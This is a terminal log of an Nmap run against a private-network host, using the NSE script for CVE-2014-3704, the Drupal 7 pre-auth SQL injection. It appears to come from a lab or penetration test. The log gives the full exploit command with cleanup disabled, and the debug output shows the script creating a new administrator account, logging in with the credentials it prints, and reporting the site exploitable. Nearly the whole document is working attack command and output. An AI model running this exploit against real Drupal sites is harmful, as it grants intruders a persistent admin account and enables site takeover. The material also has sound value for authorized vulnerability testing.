❯ nmap --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.uri="/drupal",http-vuln-cve2014-3704.cleanup=false -d 172.20.21.187
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-17 02:42 CEST
PORTS: Using top 1000 ports found open (TCP:1000, UDP:0, SCTP:0)
--------------- Timing report ---------------
  hostgroups: min 1, max 100000
  rtt-timeouts: init 1000, min 100, max 10000
  max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
  parallelism: min 0, max 0
  max-retries: 10, host-timeout: 0
  min-rate: 0, max-rate: 0
---------------------------------------------
NSE: Using Lua 5.3.
NSE: Arguments from CLI: http-vuln-cve2014-3704.uri=/drupal,http-vuln-cve2014-3704.cleanup=false
NSE: Arguments parsed: http-vuln-cve2014-3704.uri=/drupal,http-vuln-cve2014-3704.cleanup=false
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 02:42
Completed NSE at 02:42, 0.00s elapsed
Initiating Ping Scan at 02:42
Scanning 172.20.21.187 [2 ports]
Completed Ping Scan at 02:42, 0.04s elapsed (1 total hosts)
Overall sending rates: 51.95 packets / s.
mass_rdns: Using DNS server 192.168.1.21
Initiating Parallel DNS resolution of 1 host. at 02:42
mass_rdns: 0.01s 0/1 [#: 1, OK: 0, NX: 0, DR: 0, SF: 0, TR: 1]
Completed Parallel DNS resolution of 1 host. at 02:42, 0.00s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 02:42
Scanning 172.20.21.187 [1000 ports]
Discovered open port 80/tcp on 172.20.21.187
Completed Connect Scan at 02:42, 1.40s elapsed (1000 total ports)
Overall sending rates: 716.94 packets / s.
NSE: Script scanning 172.20.21.187.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 02:42
NSE: Starting http-vuln-cve2014-3704 against 172.20.21.187:80.
NSE: [http-vuln-cve2014-3704 172.20.21.187:80] adding admin user (username: 'vkuuxfitho'; passwd: 'mqjnyxqsdp')
NSE: [http-vuln-cve2014-3704 172.20.21.187:80] logging in as admin user (username: 'vkuuxfitho'; passwd: 'mqjnyxqsdp')
NSE: [http-vuln-cve2014-3704 172.20.21.187:80] logged in as admin user (username: 'vkuuxfitho'; passwd: 'mqjnyxqsdp'). Target is vulnerable.
NSE: Finished http-vuln-cve2014-3704 against 172.20.21.187:80.
Completed NSE at 02:42, 8.78s elapsed
Nmap scan report for 172.20.21.187
Host is up, received syn-ack (0.053s latency).
Scanned at 2020-05-17 02:42:40 CEST for 11s
Not shown: 997 closed ports
Reason: 997 conn-refused
PORT     STATE    SERVICE REASON
53/tcp   filtered domain  no-response
80/tcp   open     http    syn-ack
| http-vuln-cve2014-3704:
|   VULNERABLE:
|   Drupal - pre Auth SQL Injection Vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-3704
|         The expandArguments function in the database abstraction API in
|         Drupal core 7.x before 7.32 does not properly construct prepared
|         statements, which allows remote attackers to conduct SQL injection
|         attacks via an array containing crafted keys.
|
|     Disclosure date: 2014-10-15
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704
|       http://www.securityfocus.com/bid/70595
|       https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
|_      https://www.drupal.org/SA-CORE-2014-005
3260/tcp filtered iscsi   no-response
Final times for host: srtt: 52521 rttvar: 776  to: 100000

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 02:42
Completed NSE at 02:42, 0.00s elapsed
Read from /usr/local/bin/../share/nmap: nmap-payloads nmap-services.
Nmap done: 1 IP address (1 host up) scanned in 10.48 seconds